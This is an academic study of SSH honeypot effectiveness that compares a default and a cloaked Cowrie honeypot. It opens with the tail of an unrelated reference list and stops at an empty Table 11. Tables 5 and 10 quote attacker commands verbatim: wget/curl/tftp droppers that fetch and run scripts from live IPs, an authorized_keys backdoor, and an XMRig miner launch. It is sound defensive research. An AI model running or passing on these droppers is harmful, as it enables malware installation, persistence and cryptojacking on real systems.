7. Fu, Y., Zhang, S., Wu, S., Wan, C., Lin, Y.: Patch-fool: are vision transformers always robust against adversarial perturbations? (2022)
8. Hinton, G., Vinyals, O., Dean, J.: Distilling the knowledge in a neural network (2015)
9. Jiao, X., et al.: Tinybert: distilling BERT for natural language understanding. CoRR, abs/1909.10351 (2019)
10. Liu, Z., Wang, Y., Han, K., Ma, S., Gao, W.: Post-training quantization for vision transformer (2021)
11. Moosavi-Dezfooli, S.M., Fawzi, A., Fawzi, O., Frossard, P.: Universal adversarial perturbations. CoRR, abs/1610.08401 (2016)
12. Rao, Y., Zhao, W., Liu, B., Lu, J., Zhou, J., Hsieh, C.J.: Dynamicvit: efficient vision transformers with dynamic token sparsification. CoRR, abs/2106.02034 (2021)
13. Rauber, J., Brendel, W., Bethge, M.: Foolbox v0.8.0: a python toolbox to benchmark the robustness of machine learning models. CoRR, abs/1707.04131 (2017)
14. Singla, Y.K., Parekh, S., Singh, S., Chen, C., Krishnamurthy, B., Shah, R.R.: Minimal: mining models for universal adversarial triggers. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 36, no. 10, pp. 11330–11339 (2022)
15. Sotudeh, S., Goharian, N.: Tstr: too short to represent, summarize with details! intro-guided extended summary generation (2022)
16. Touvron, H., Cord, M., Douze, M., Massa, F., Sablayrolles, A., Jégou, H.: Training data-efficient image transformers and distillation through attention (2020)
17. Vaswani, A., et al.: Attention is all you need. CoRR, abs/1706.03762 (2017)
18. Fang, Y., Huang, K., Wang, M., Cheng, Y., Chu, W., Cui, L.: Width and depth pruning for vision transformers. In: Proceedings of the AAAI Conference on Artificial Intelligence, vol. 36, no. 3, pp. 3143–3151 (2022)
19. Zhai, X., Kolesnikov, A., Houlsby, N., Beyer, L.: Scaling vision transformers. CoRR, abs/2106.04560 (2021)
20. Zhang, J., et al.: Minivit: compressing vision transformers with weight multiplexing (2022)
21. Zhao, Y., Shumailov, I., Mullins, R.D., Anderson, R.: To compress or not to compress: understanding the interactions between adversarial attacks and neural network compression. CoRR, abs/1810.00208 (2018)
Analysis of SSH Honeypot Effectiveness
Connor Hetzler, Zachary Chen, and Tahir M. Khan
Purdue University, West Lafayette, IN, USA
[email protected]
Abstract. The number of cyberattacks has increased in the twenty-first century, with the FBI receiving 791,790 individual internet crime complaints in the United States in 2020. As attackers become more sophisticated with their ransomware and malware campaigns, there is a significant need for security researchers to assist the greater community by running vulnerable honeypot machines to collect malicious software. The ability to collect meaningful malware from attackers depends on how the attackers perceive the honeypot. Most attackers fingerprint targets before they launch their attack, so it would be very beneficial for security researchers to understand how to hide honeypots from fingerprinting and trick the attackers into depositing malware. This study investigated the use of a cloaked and an uncloaked SSH honeypot to learn how attackers fingerprint SSH honeypots and how effective it is to cloak the honeypot by changing the features that attackers fingerprint. This paper compares the number of logins and commands run by the attackers captured on default and cloaked Cowrie honeypots. The project lasted just over a month, and the cloaked honeypot received 74.5% of the total login attempts and 53% of the commands executed on the honeypot systems, as it was more believable than the uncloaked honeypot. This paper reports that modifying SSH honeypot systems improves malware collection effectiveness. This project focuses on monitoring attacker tactics on a standard SSH honeypot to understand their fingerprinting commands, integrating those that are missing into the cloaked honeypot, and adding or modifying files with which the attackers interact. The attackers utilized a variety of UNIX commands and files on the honeypots. The attackers who successfully logged into the SSH honeypot downloaded malware, including IRC bots, Mirai, Xmrig cryptominers, and many others.
What is certain is that if a cautious attacker believes they are in a honeypot, they will leave without depositing malware onto the system, which reduces the effectiveness of the honeypot for security research.
Keywords: SSH honeypot · Cowrie · Linux honeypot · Malware forensics · Attacker tactics · Honeypot Effectiveness
© The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 759–782, 2023. https://doi.org/10.1007/978-3-031-28073-3_51
1 Introduction
Understanding how attackers target machines and how to mitigate such attacks is a critical component of information security and data protection. With the rapid rise and transition to online working environments, the Internet has become a vital part of our daily lives. It has made it easier for attackers to deliver malware, ransomware, and other
threats. According to researchers at the University of Maryland, a hacker attack occurs every 39 seconds on average in the United States [12]. Over 1 in 3 Americans have reported having their private computer breached and information stolen [13]. Even with such a widespread problem, there is no readily available information for the general public to understand common attack methods, mitigation techniques, and basic computer security. Many people are not technologically savvy and either do not understand the issue, ignore it completely, or rely on a third party to provide security.
The name honeypot is inspired by trappers placing honey-filled containers to lure bears. In the information technology (IT) industry, honeypots are passive systems that lure attackers and log their every action. As a decoy system, a honeypot has flaws to attract an attacker, but they should be subtle enough not to raise suspicion. The honeypot system used in this study is Cowrie, developed by Michel Oosterhof [8] as a medium-level interactive SSH and Telnet honeypot that records brute-force attacks and the commands attackers run in the shell after being authenticated [3]; however, we use it only for SSH, not Telnet. It is popular for its ease of use, open-source code, and ability to monitor attacks.
The first phase of the research involved monitoring the commands and files accessed on a default Cowrie honeypot in order to create a list of files and commands to change on the cloaked Cowrie honeypot. The goal was to better hide the honeypot and present the attacker with a more authentic-looking target server, increasing the number of malicious attacks and malware launched against the server. The second phase consisted of applying the lessons about attacker fingerprinting from phase 1 to the cloaked honeypot to make it more realistic.
Organizations and security researchers can take the two-phase research conducted in this paper and apply it to honeypots in their control to improve the resistance to fingerprinting. This research will be helpful to the security community because it offers insight and building blocks for those running SSH honeypots. Researchers who want to increase their fingerprinting resistance or increase the malicious traffic to their honeypots can use the files and commands identified in Tables 1, 2, 3, and 4 to customize their Cowrie honeypot. Two honeypot SSH servers were set up: one was a default Cowrie SSH honeypot which was downloaded from GitHub without modification [8], and the other was intended to be harder to fingerprint as a honeypot, called the Cowrie “cloaked” version, which was created by removing default values [9], adding commands and modifying files from the default version. The metrics that attackers look for in a honeypot were collected prior to the project by running the default Cowrie version and monitoring any commands, files, or implementing other features that were attempted to be accessed by an attacker and are expected to be included in a typical Linux server. All information that was generated on the honeypots was automatically logged in Splunk. The project team hypothesized that the cloaked honeypot would generate more interest and receive the most diverse number of attacks and malware installed due to it being the least similar to a standard honeypot. The content covered in this paper could be generalized to examine the effectiveness of any type of research honeypot, especially in cases where researchers want to use honeypots to discover new types of ransomware and zero-day exploits since attackers who deploy these types of new malware are more cautious of honeypots when deploying and need more realistic machines.
The paper is organized as follows: Sect. 2 covers related research in the field of SSH honeypots. Section 3 discusses the methodology and steps to replicate the research conducted. Section 4 covers the data and results of our research study, which are broken down into results from the uncloaked default honeypot and the cloaked honeypot. Section 5 compares the data collected on the uncloaked and cloaked honeypots. Lastly, Sect. 6 concludes the research conducted and the data collected.
2 Background
Understanding how attackers target machines and what characteristics of a machine make an attacker more likely to install malware is a critical component of information security research. Since the early 2000s, many articles have covered how to extract meaningful threat intelligence from large amounts of honeypot logs, and many have researched the visualization of honeypot data for threat intelligence. Articles from Phrack magazine from 2004 [5] and [6] discussed how honeypots could be identified and vulnerabilities exploited to give attackers more power to identify honeypots in the wild, demonstrating the need for security researchers to identify and upgrade aspects of honeypots that allow for fingerprinting. Baser et al. [1] discuss visualizing honeypot logs to generate actionable threat intelligence, but they do not discuss improving or modifying the honeypot to make it more difficult to fingerprint. Their research covered the use of Cowrie SSH and Telnet honeypots with the goal of creating visualizations. Previous research conducted by AlMohannadi et al. [2] and Koniaris et al. [4] focused on the post-compromise actions and motives of attackers using SSH attacks on honeypots and how to conduct proper analysis so organizations can make better security decisions. Koniaris et al. [4] discussed the impact of attackers fingerprinting honeypots but did not specify what should be changed in the honeypot. The malware downloaded by the attackers in the study in [2] was notable because it was similar to the malware installed in our project, such as IRC Command and Control and cryptominers. Dornseif et al. [7] discuss how attackers can detect honeypots by looking at inconsistencies in byte counts for network interfaces and by using timing attacks. However, these techniques apply to older honeypot software that differs from Cowrie, the honeypot used in this study. Dornseif et al.
[7] also mention the downside of publishing research on honeypots: it allows blackhats (malicious hackers) to gain insight into what security researchers are working on, study our work, and devise methods to circumvent it. Some articles have previously discussed how to improve the Cowrie honeypot. Dahbul et al. [11] advise modifying the ping command so that it only pings valid addresses. Older versions of Cowrie allowed pinging addresses that do not exist, such as 999.999.999.999, which was an easy indicator to an attacker that they were in a honeypot. Dahbul et al. [11] also discuss how to improve other types of honeypots to reduce the ability to fingerprint them. Other previous research by McCaughey et al. [10] investigated how changing the authentication database for Cowrie would impact the volume of attacks. They used a four-stage study in which the password database was modified to be progressively easier to brute force as the stages moved on. McCaughey et al. [10] suggest that attackers check for the existence of normal UNIX commands, and the absence of a command, which is common in honeypots as
they do not exactly replicate a real machine, can be an indicator of a honeypot, but they do not discuss how to modify or increase the honeypot’s effectiveness. This research paper differs from others that discuss honeypot fingerprinting in that we compare a custom, fingerprint-reduced honeypot against the default honeypot. This allows us to study the effectiveness of the customization and provide evidence that the cloaking increased the attacker volume, rather than simply suggesting ways to improve effectiveness. Although there are many research papers on SSH honeypots, few articles discuss how to reduce the effectiveness of fingerprinting. One reason for the lack of public research was made clear in the review of previous research [5] and [6], which suggested that publicly publishing information on how to secure honeypots gives advantages to attackers. The absence of modern research covering methods to hide honeypots may result from the need for secrecy on the topic. However, we feel there is value in sharing our findings to help other security researchers. We also understand that attackers may read this article. Therefore, we chose not to go into detail about exactly what was changed in a file or command to make it harder to fingerprint; instead, we only indicate that the file or command was changed from the default Cowrie honeypot.
3 Methodology
While many different types of systems are under constant threat of attack, SSH servers receive some of the most attack attempts of any protocol, which is why we decided to focus on SSH honeypots for our project. The purpose of using a Cowrie honeypot rather than a real system to conduct malware research is to mislead the attacker into believing they have accessed an insecure business SSH server while not allowing the attacker to cause any real harm or damage. Cowrie allows attackers to connect to the honeypot and execute predefined Linux commands. It does not allow them to execute any downloaded programs but captures the downloaded malware for later analysis. All the commands and information recorded by Cowrie are exported to a separate Splunk server for record-keeping and data analysis off the honeypot. All systems used for this project are hosted in the Amazon Web Services (AWS) us-east-2 region. These systems were created from a template Amazon Machine Image (AMI), which was built by following Center for Internet Security (CIS) level 1 recommendations for Ubuntu 20.04 machines and creating an AMI from that machine. The purpose of following the CIS recommendations is to harden the systems, because we only want attackers getting into the Cowrie honeypots and not into the true host machine. The AMI template also allows for easy replication and deployment of the necessary systems, as depicted in Fig. 1, such as a Splunk server for reporting and logging and the two Cowrie honeypots for the project. The research project used three servers on AWS. The first was Splunk Enterprise, which used the CIS level 1 Ubuntu AMI, accepted remote logs on port TCP 5140, and stored them on disk for later analysis and visualization. The next was the unmodified Cowrie server, made from the CIS level 1 Ubuntu AMI, which included a default installation of the Cowrie SSH honeypot configured to listen for SSH on port TCP 22.
The last machine was the cloaked Cowrie server, made from the CIS level 1 Ubuntu AMI, which included a modified installation of the Cowrie SSH honeypot to make it more fingerprint-resistant, the
process discussed in depth below, and also accepted SSH connections on port TCP 22. The research project was executed in two phases. The first phase used only the default Cowrie honeypot. It identified the files and commands in default Cowrie that needed changes to behave more like real UNIX commands and files; those identified were used to create the cloaked honeypot, which was used in phase 2 of the research. Phase two consisted of running the cloaked and default Cowrie honeypots at the same time to study which machine received more traffic and commands. Figure 1 depicts the architecture for the research:
Fig. 1. AWS topology diagram
The firewall was configured in AWS to allow any traffic on IPv4 TCP port 22 to the Cowrie honeypots and traffic from the honeypots to Splunk on TCP port 5140. The unmodified honeypot had an internet address in the 18.119.0.0/16 subnet, and the cloaked honeypot had an internet address in the 13.58.0.0/16 subnet. The primary goal of the project is to determine whether creating a cloaked Cowrie machine by modifying the default uncloaked Cowrie machine results in an increase in malicious traffic or resistance to fingerprinting. The Cowrie-Unmodified machine is a default Cowrie installation: the honeypot was left unmodified from the default configuration listed in the Cowrie GitHub project, and the password authentication was set to auth random. Auth random is a Cowrie configuration that lets an attacker into the shell after a certain number of guesses, no matter what the password is; the accepted password is then saved for that IP address, and later logins from the same source IP address are accepted only with that password. The cloaked Cowrie server also used auth random. To create the cloaked Cowrie server, we had to research the commands that attackers would use to fingerprint the system and determine whether or not it was a honeypot. Table 1 lists the commands that were used to fingerprint the uncloaked honeypot during our pre-research phase and were not available on the default Cowrie system. Table 2 shows the files the attackers interacted with on the uncloaked honeypot.
Table 1. Commands run on the uncloaked system which failed
Command run                              Action taken
lspci | grep irti                        Added lspci to cloaked honeypot
dmesg | grep irtual                      Added dmesg to cloaked honeypot
dmidecode|grep Vendor|head -n 1          Added dmidecode to cloaked honeypot
/ip cloud print                          This is a Windows command, so no action was taken
command -v curl                          Added command to cloaked honeypot
lspci | grep -i --color 'vga\|3d\|2d';   Added lspci to cloaked honeypot
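A list like Table 1 can be derived by tallying the commands that the honeypot reported as not found. The sketch below is a minimal illustration, not the Splunk-based workflow used in this study: it assumes Cowrie's JSON log output, in which each line is a JSON object with an `eventid` field and failed commands carry the event id `cowrie.command.failed` and an `input` field. The function name and the sample lines are hypothetical.

```python
import json
from collections import Counter

def failed_commands(log_lines):
    """Count the program names of commands the honeypot could not execute."""
    counts = Counter()
    for line in log_lines:
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines
        if not isinstance(event, dict):
            continue
        if event.get("eventid") == "cowrie.command.failed":
            # Keep only the program name, e.g. "lspci" from "lspci | grep irti".
            parts = str(event.get("input", "")).split()
            if parts:
                counts[parts[0]] += 1
    return counts

# Hypothetical sample lines in the assumed log format.
sample = [
    '{"eventid": "cowrie.command.failed", "input": "lspci | grep irti"}',
    '{"eventid": "cowrie.command.input", "input": "uname -a"}',
    '{"eventid": "cowrie.command.failed", "input": "dmesg | grep irtual"}',
    'not json',
    '{"eventid": "cowrie.command.failed", "input": "lspci"}',
]
missing = failed_commands(sample)
```

Sorting the resulting counter with `missing.most_common()` gives a priority order for which commands to add to a cloaked honeypot first.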
Table 2. Files attackers interacted with on uncloaked honeypot
File path                     Action taken
/proc/cpuinfo                 Changed file contents on cloaked honeypot
/dev/ttyGSM*,                 None of these files were added because they
/dev/ttyUSB-mod*,             appear to target cell modems, which was not a
/var/spool/sms/*,             malware type we were interested in collecting
/var/log/smsd.log,            for this project
/etc/smsd.conf*,
/usr/bin/qmuxd,
/var/qmux_connect_socket,
/etc/config/simman,
/dev/modem*,
/var/config/sms/*
/tmp                          No action, directory already existed
/var/run                      No action, directory already existed
/mnt                          No action, directory already existed
/root                         No action, directory already existed
/proc/1                       No action, file already existed
/var/run/gcc.pid              No action, file is created when program is run
After collecting these commands and studying the files the attackers interacted with on the uncloaked honeypot, we were able to create the cloaked honeypot. The Cowrie-Cloaked machine has a few Linux commands that the uncloaked machine lacks, and several existing commands were edited to return unique values, as shown in Table 3. Another cloaking method is to remove the default user account and home directory of phil. This user exists on all Cowrie honeypots by default, so it is an easy way for attackers to identify a honeypot. The other files that were changed are shown in Table 4. With these changes, the cloaked machine is expected to be an ideal target for attackers because they should not easily identify it as a honeypot, which allows for a better collection of malware and more malicious traffic.
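To make the role of the default phil account concrete, the following sketch shows the kind of check that could reveal a default installation from the contents of /etc/passwd. The function name and the sample passwd entries are hypothetical and serve only as an illustration; they are not taken from the honeypots in this study.

```python
def has_default_cowrie_user(passwd_text, default_user="phil"):
    """Return True if /etc/passwd-style text contains an account with the given name."""
    for line in passwd_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        # The account name is the first colon-separated field.
        if line.split(":", 1)[0] == default_user:
            return True
    return False


# Hypothetical passwd contents, for illustration only.
uncloaked_passwd = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "phil:x:1000:1000:Phil,,,:/home/phil:/bin/bash\n"
)
cloaked_passwd = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "admin:x:1000:1000::/home/admin:/bin/bash\n"
)

uncloaked_flagged = has_default_cowrie_user(uncloaked_passwd)
cloaked_flagged = has_default_cowrie_user(cloaked_passwd)
```

A check of this kind only needs one field of one file, which is why removing the account and its home directory is a cheap but worthwhile cloaking step.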
Analysis of SSH Honeypot Effectiveness

Table 3. Commands changed on cloaked system
Command name  Type of change
lspci         Added to cowrie
dmesg         Added to cowrie
dmidecode     Added to cowrie
command       Added to cowrie
uname         Edited return value
free          Edited return value
ifconfig      Edited return value

Table 4. Files changed on cloaked system
File path                            Action taken
/home/phil                           Directory deleted
/etc/hostname                        Changed
/etc/passwd                          Changed
/etc/group                           Changed
/etc/shadow                          Changed
/etc/issue                           Changed
/etc/motd                            File deleted
/proc/cpuinfo                        Changed
/proc/uptime                         Changed
/proc/mounts                         Changed
/proc/meminfo                        Changed
/proc/version                        Changed
/proc/net/arp                        Changed
/share/cowrie/txtcmds/bin/dmesg      File created
/share/cowrie/txtcmds/bin/lspci      File created
/share/cowrie/txtcmds/bin/dmidecode  File created
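
The "File created" rows of Table 4 can be sketched as follows. The sketch assumes that a file placed under share/cowrie/txtcmds/bin is returned verbatim as the output of the command with the same name, which is our understanding of Cowrie's text commands. The helper name and the sample lspci output are hypothetical, and a temporary directory stands in for the Cowrie installation directory.

```python
import tempfile
from pathlib import Path


def write_txtcmd(cowrie_root, command_name, output_text):
    """Create a static-output command file under share/cowrie/txtcmds/bin."""
    target = Path(cowrie_root) / "share" / "cowrie" / "txtcmds" / "bin" / command_name
    target.parent.mkdir(parents=True, exist_ok=True)
    target.write_text(output_text, encoding="utf-8")
    return target


# Hypothetical output for illustration; a real deployment would copy the
# output of a genuine machine that the honeypot is meant to imitate.
FAKE_LSPCI = "00:00.0 Host bridge: Intel Corporation 440FX - 82441FX PMC [Natoma] (rev 02)\n"

with tempfile.TemporaryDirectory() as root:
    path = write_txtcmd(root, "lspci", FAKE_LSPCI)
    relative = path.relative_to(root).as_posix()
    written = path.read_text(encoding="utf-8")
```

Because attackers pipe these commands through grep (see Table 1), the chosen output matters: text that contains strings such as "Virtual" would still match their filters.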
4 Data and Results
The data for the project were collected between April 5, 2022, and April 18, 2022. They show a significantly higher volume of login attempts and executed commands on the cloaked machine than on the uncloaked machine. The cloaked honeypot also received a large amount of traffic from a few specific IP addresses. In contrast, the uncloaked honeypot received a more diverse and evenly spread volume of traffic. We attribute this difference to greater interest in the cloaked honeypot, which increased the malicious campaigns of a few specific actors.
This study found that attackers were interested in both the cloaked and uncloaked SSH servers; however, the attackers displayed more interesting behavior and deposited more active malware on the cloaked server. The data in Appendix A (Tables 14 and 15) show that attackers repeatedly enter the same commands on the target SSH servers, which most likely reflects scripted malicious actors rather than real people attacking the servers. The following sections cover data collected from the honeypots, which provides insight into attacker tactics: the per-honeypot data begin in Sect. 4.1, and the two honeypots are compared in Sect. 5. The chart below depicts the breakdown of attacker source IP addresses targeting both cloaked and uncloaked machines:
Fig. 2. Source IP addresses connecting to cowrie
Figure 2 shows the large volume of attacks launched from the 5.188.62.0/24 subnet, suggesting that the attack planning and execution originated from a single network source. The following sections divide the source IP addresses between the cloaked and uncloaked machines. Figure 3 depicts the top attempted usernames for both systems.
Figure 3 shows that attackers prefer accounts that are likely to have elevated privileges on the system because they want to run commands without restriction and have full access to the filesystem. A large share of the commands the attackers ran required elevated privileges; examples are listed in Table 5. Table 5 suggests that attackers are only interested in executing malware from accounts that have root privileges; otherwise, the malware will not download onto the system. To better understand the data, the cloaked and uncloaked systems' data are analyzed separately in the following sections.
4.1 Uncloaked Data
Between April 5, 2022, and April 18, 2022, the uncloaked Cowrie honeypot received 828 command executions and 4,696 total login attempts, of which 829 succeeded and 3,867 failed.
Fig. 3. Attempted usernames: Admin 80.3%, 123456 3.6%, Root 1.9%, Test 1.7%, Romano 1.7%, Ubuntu 1.1%, Password 0.8%, Other (12) 8.9%

Table 5. Commands executed on honeypot systems
Count  Percent  Command run
132    15.94    cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
11     1.33     cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *
7      0.88     #!/bin/sh; PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin; wget http://182.52.51.239/scripts/23s; curl -O http://182.52.51.239/scripts/23s; chmod +x 23s; ./23s; wget http://182.52.51.239/scripts/23; curl -O http://182.52.51.239/scripts/23; chmod +x 23; ./23; rm -rf 23.sh;

Table 6. Uncloaked login attempts (failed 82.3%, succeeded 17.7%)
Login result  Percentage
Succeeded     17.7
Failed        82.3

Table 6 shows that far more login attempts failed than succeeded. This is most likely the result of an attacker strategy for identifying honeypot servers: once attackers find a username/password pair that works, they log out and try another password for the same username to see whether they are still allowed in. As more attackers fingerprint the server in this way, they generate more failed login attempts than successful ones. Figure 4 depicts the attack sources for the uncloaked server, which include a wide range of subnets.
Fig. 4. Source IP addresses
The data show that the attackers were dispersed across many different IP addresses and subnets, with a high degree of diversity among the IP addresses. This is most likely due to a large number of independent attackers connecting to the machine, fingerprinting it, discovering that it is likely a honeypot, and then disconnecting. Many different malware distribution bots use the same tactic of connecting and fingerprinting, which explains the variety of attack source IPs. In summary, on the uncloaked machine a significant majority of login attempts failed, and no single subnet accounted for a clear majority of the malicious SSH traffic. The following section covers the data collected from the cloaked, fingerprint-resistant honeypot.
4.2 Cloaked Data
Between April 5, 2022, and April 18, 2022, the cloaked Cowrie honeypot received 932 command executions and 13,691 total login attempts, of which 9,977 succeeded and 3,714 failed. Table 7 shows the ratio of successful to failed login attempts.

Table 7. Cloaked login attempts (succeeded 72.9%, failed 27.1%)
Login result  Percentage
Succeeded     72.9
Failed        27.1

The data show that more of the attackers' login attempts succeeded than failed. This is likely because the initial fingerprinting usually led the attackers to believe the system was genuine and not a honeypot; hence, they progressed to further stages of the infection and created more logins. The sources of the attacks launched against the cloaked system were vastly different from those seen on the uncloaked system, as shown in Fig. 5 below:
Fig. 5. Cloaked login attempt source IP
The data show a large volume of attack traffic originating from the 5.188.62.0/24 subnet, which was not seen on the uncloaked machine. The likely cause of the change in attack source is that the initial fingerprinting of the cloaked machine deceived the attackers and convinced them to proceed with the next stage of their attack, which may have been hosted in that subnet. On the uncloaked machine, by contrast, we suspect that the attackers detected early and easily that the machine was a honeypot and moved on to another target. Further research is required to determine the root cause of the observed change in source IP addresses. In summary, on the cloaked honeypot a significant majority of login attempts succeeded, and a single subnet accounted for a clear majority of the attack traffic; we expect that both result from the improved fingerprint resistance of the cloaked honeypot and increased interest from attackers. The following section discusses how the data collected from the uncloaked and cloaked honeypots differ and draws conclusions on the reasons for the differences.
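The subnet breakdowns behind Figs. 2, 4, and 5 can be approximated by grouping source addresses into /24 networks and counting them. The sketch below uses Python's standard ipaddress module; the function name is our own, and the sample addresses are made up for illustration (only the 5.188.62.0/24 prefix comes from the text, the other addresses are from documentation ranges).

```python
from collections import Counter
import ipaddress


def top_subnets(source_ips, prefix_len=24):
    """Count source IPs per enclosing subnet and return (subnet, count) pairs, largest first."""
    counts = Counter(
        str(ipaddress.ip_network(f"{ip}/{prefix_len}", strict=False))
        for ip in source_ips
    )
    return counts.most_common()


# Made-up sample of login source addresses, for illustration only.
sample_ips = [
    "5.188.62.10", "5.188.62.11", "5.188.62.200",
    "192.0.2.5", "198.51.100.9",
]
ranking = top_subnets(sample_ips)
```

Applied to the honeypot logs, a ranking in which one /24 dominates would correspond to the concentrated pattern seen on the cloaked machine, while a flat ranking would correspond to the dispersed pattern seen on the uncloaked machine.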
5 Comparison
The main difference between the cloaked and uncloaked honeypots is their filesystems. The cloaked honeypot has extra commands, as shown in Table 3, and added or modified configuration files, as shown in Table 4. These modifications separate the cloaked honeypot from the Cowrie honeypot currently available on GitHub and allow it to resist fingerprinting better. The cloaked honeypot received significantly more attacker traffic than the uncloaked one: 13,691 versus 4,696 login attempts during the period from April 5, 2022, to April 18, 2022.

Table 8. Ratio of login attempts by destination
Honeypot machine  Percentage
Cloaked           74.5
Uncloaked         25.5

Table 8 shows that cloaking was very effective at producing more login attempts; we suspect this is because the attackers think they have found a legitimate server rather than something to avoid. Almost all attackers fingerprint the system when they first connect, for example, by running uname or looking into the /proc/ directory. When an attacker realizes the system is a default Cowrie honeypot, they take note of it, log out, typically do not execute malware, and usually do not return to the machine. The total number of commands entered into the uncloaked honeypot was 828, while the cloaked honeypot received 932 commands. Table 9 compares the commands executed on the two honeypots.

Table 9. Ratio of commands executed on the systems
Honeypot machine  Percentage
Cloaked           53.0
Uncloaked         47.0
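
The percentages in Tables 6 to 9 follow directly from the raw counts reported in Sects. 4.1 and 4.2. The short calculation below reproduces them and also derives the number of commands per login attempt; the variable names are our own, and the counts are copied from the text.

```python
# Raw counts reported in Sects. 4.1 and 4.2.
counts = {
    "uncloaked": {"succeeded": 829, "failed": 3867, "commands": 828},
    "cloaked": {"succeeded": 9977, "failed": 3714, "commands": 932},
}


def pct(part, whole):
    """Return part as a percentage of whole."""
    return 100.0 * part / whole


summary = {}
for name, c in counts.items():
    logins = c["succeeded"] + c["failed"]
    summary[name] = {
        "logins": logins,
        "success_pct": pct(c["succeeded"], logins),      # Tables 6 and 7
        "commands_per_login": c["commands"] / logins,
    }

total_logins = sum(s["logins"] for s in summary.values())
total_commands = sum(c["commands"] for c in counts.values())
login_share = {n: pct(s["logins"], total_logins) for n, s in summary.items()}       # Table 8
command_share = {n: pct(counts[n]["commands"], total_commands) for n in counts}      # Table 9

for name in counts:
    print(name, round(summary[name]["success_pct"], 1),
          round(login_share[name], 1), round(command_share[name], 1),
          round(summary[name]["commands_per_login"], 3))
```

The commands-per-login figure is higher for the uncloaked honeypot even though its absolute command count is lower, because its login total is roughly a third of the cloaked honeypot's.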
Table 9 shows that the cloaked machine received the majority of the commands, suggesting that attackers were more interested in the cloaked machine than in the uncloaked one. However, the uncloaked system received more commands relative to its login attempts, despite receiving around 100 fewer commands than the cloaked system, which implies that attackers ran more commands per login on the uncloaked machine. One possible reason is that attackers fingerprint the uncloaked system extensively, whereas on the cloaked machine they fingerprint less and quickly download the malware instead. Another possible reason is that attackers poisoned our data by running extra commands once they determined that the uncloaked server was a research honeypot. The cloaked honeypot has five one-line malware dropper commands among its top 20 executed commands, as shown in Table 11, while the uncloaked honeypot has only four, as shown in Table 10. Malware droppers account for 32.7% of the top 20 command executions on the uncloaked machine, compared with 21.4% on the cloaked machine. Even though the cloaked honeypot received somewhat fewer malware dropper executions than the uncloaked one, the difference is not large enough to rule out outliers in the data. Given all of the other evidence, we therefore still assert that the cloaked honeypot was more fingerprint-resistant and increased the malicious traffic to the honeypot. This finding is another reason why more research is needed to validate the claim that fingerprint-resistant honeypots increase attacker traffic compared with standard honeypots.

Table 10. Uncloaked honeypot malware dropper commands (32.7% of top 20 commands executed)
Count  Percentage of total commands  Command executed
132    15.942029                     cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.90.160.54/onion002; curl -O http://45.90.160.54/onion002; chmod 777 onion002; sh onion002; tftp 45.90.160.54 -c get onion002.sh; chmod 777 onion002.sh; sh onion002.sh; tftp -r.sh -g 45.90.160.54; chmod 777 onion002; sh onion002; ftpget -v -u anonymous -p anonymous -P 21 45.90.160.54.sh.sh; sh.sh; rm -rf sh bins.sh.sh.sh; rm -rf *
25     3.019324                      cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
17     2.05314                       wget http://45.90.161.105/systemd && chmod +x * && ./systemd -o de.minexmr.com:443 -B -u 8BHQUunQHax1XjPonUxPKk1H4EKP6SdXnMtyyY5W9Bts7qM7uq5XsjjXiPj1zacMGP8chCv4cumYZRYfH5cUBGshKy1gssW -k --tls --rig-id Main
11     1.328502                      cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://136.144.41.55/Saitama.sh; curl -O http://136.144.41.55/Saitama.sh; chmod 777 Saitama.sh; sh Saitama.sh; tftp 136.144.41.55 -c get tSaitama.sh; chmod 777 tSaitama.sh; sh tSaitama.sh; tftp -r tSaitama2.sh -g 136.144.41.55; chmod 777 tSaitama2.sh; sh tSaitama2.sh; ftpget -v -u anonymous -p anonymous -P 21 136.144.41.55 Saitama1.sh Saitama1.sh; sh Saitama1.sh; rm -rf Saitama.sh tSaitama.sh tSaitama2.sh Saitama1.sh; rm -rf *

Table 11. Cloaked honeypot malware dropper commands (21.4% of top 20 commands executed)
Count  Percentage of total commands  Command executed
